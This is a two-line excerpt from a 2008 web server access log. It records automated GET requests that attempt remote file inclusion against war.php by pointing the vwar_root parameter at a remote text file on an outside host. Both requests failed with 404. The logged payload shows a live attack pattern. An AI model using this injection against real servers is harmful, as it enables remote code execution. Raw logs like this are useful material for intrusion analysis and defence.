69.93.132.138 - - [17/Apr/2008:15:10:26 -0700] "GET /logs/access_080201.log//war.php?vwar_root=http://iulian.pokol.hu/iuli/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.93.132.138 - - [17/Apr/2008:15:10:26 -0700] "GET //war.php?vwar_root=http://iulian.pokol.hu/iuli/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
